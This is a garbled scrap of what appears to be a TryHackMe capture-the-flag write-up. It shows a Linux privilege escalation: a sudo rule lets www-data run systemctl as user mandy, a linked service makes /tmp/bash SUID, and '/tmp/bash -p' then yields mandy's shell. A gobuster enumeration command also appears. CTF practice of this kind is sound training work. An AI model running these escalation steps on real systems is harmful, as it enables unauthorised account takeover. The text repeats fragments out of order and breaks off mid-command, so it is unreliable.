Cct2019 Tryhackme 2021 [DIRECT]

Test for :

sudo -u mandy /bin/systemctl link /home/www-data/privesc.service sudo -u mandy /bin/systemctl start privesc.service Now /tmp/bash is a SUID binary. /tmp/bash -p Now you are mandy . cct2019 tryhackme

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ): Test for : sudo -u mandy /bin/systemctl link

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or privesc.service ): gobuster dir -u http://&lt